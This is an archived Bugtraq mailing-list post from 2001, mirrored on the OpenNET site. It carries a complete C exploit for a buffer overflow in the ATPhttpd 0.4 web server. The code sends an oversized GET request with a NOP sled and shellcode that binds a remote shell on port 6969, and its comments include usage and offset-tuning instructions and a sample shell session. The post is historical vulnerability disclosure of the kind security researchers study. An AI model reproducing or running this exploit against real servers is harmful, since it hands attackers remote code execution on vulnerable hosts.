The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

ATPhttpd 0.4 DoS Vulnerability (POC exploit)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Sat, 15 Dec 2001 21:50:28 -0800
From: methodic <methodic@slartibartfast.angrypacket.com>
To: bugtraq@securityfocus.com
Subject: ATPhttpd 0.4 DoS Vulnerability (POC exploit)

--XsQoSWH+UP9D9v3l
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Proof of concept exploit for ATPhttpd 0.4

-- 
+ methodic >> [http://methodic.angrypacket.com] -- -
+ Cannot find nsabackdoor.dll. Please reinstall Windows.

--XsQoSWH+UP9D9v3l
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="atphttpd-smack.c"

/* remote exploit for ATPhttpd 0.4 */
/* $Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
 * "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
 * was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the 
 * source for the hell of it. Ran ye old perl Ax4000|nc and did some 
 * gdb'n and noticed that it said the return address was 0x41414141. 
 * Well that speaks for itself...
 *
 * - dmuz@angrypacket.com
 */

/*
 * developed and tested against OpenBSD. exploit creates a port-binding
 * shell on the remote machine on port 6969 with the uid of the server.
 * try offsets between 5000 and -5000 with increments of 100. -200 worked
 * like a charm for me.
 *
 * ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
 * [methodic@vulnhost] [~]$ nc localhost 6969
 * whoami
 * methodic
 * id
 * uid=1009(methodic) gid=1009(methodic)
 * ^C punt!
 *
 * mad thankz to vegac who helped me with a lame bug i was over looking
 */

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

/* 701 A's to own the EIP */
#define LEN		900
#define NOP		0x90

/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

unsigned long get_sp(void) {
	__asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {

	int sockfd=0, port=0, offset=0;
	int ch, i;
	long retaddr;
	char *host=NULL, http_request[LEN+20];
	char *payload, *ptr=(char *)&shellcode;
	struct sockaddr_in s;

	while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
		switch (ch) {
			case 'h':
				host = optarg;
				break;
			case 'p':
				port = atoi(optarg);
				break;
			case 'o':
				offset = atol(optarg);
				break;
		}
	}

	printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
	if(!host) {
		usage(argv[0]);
	}
	if(!port) {
		port = 80;
	}

	/* setup socket structure */
	bzero(&s, sizeof(s));
	s.sin_family = AF_INET;
	s.sin_port = htons(port);
	s.sin_addr.s_addr = inet_addr(host);

	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror(" + socket");
		exit(1);
	}

	if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
		perror(" + connect");
		exit(1);
	}

	/* build c0dez.. */
	payload = (char *)malloc(LEN);

	retaddr = get_sp() - offset;
	printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr, offset);

	/* fill the buffer with return addr's */
	for(i = 0; i < LEN; i += 4)
		*(long *)&payload[i] = retaddr;

	/* fill in some NOPs */
	for(i = 0; i < ((LEN/2) - 100); i++)
		*(payload + i) = NOP;

	/* copy the shellcode and terminate the payload string */
	memcpy(payload + i, ptr, strlen(ptr));
	payload[LEN-1] = '\0';

	bzero(&http_request, LEN+20);
	strcpy(http_request, "GET ");
	strcat(http_request, payload);
	strcat(http_request, " HTTP/1.0\r\n\r\n");
	free(payload);

	printf(" + sending payload to <%s> on port [%d].. ", host, port);
	send(sockfd, http_request, strlen(http_request), 0);
	printf("done\n");
	close(sockfd);

	printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
	printf(">> visit http://sec.angrypacket.com for more security tools\n");

	return(0);

}

int usage(char *progname) {
	fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o <offset>\n", progname);
	exit(0);
}

--XsQoSWH+UP9D9v3l--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network. RB2 Network.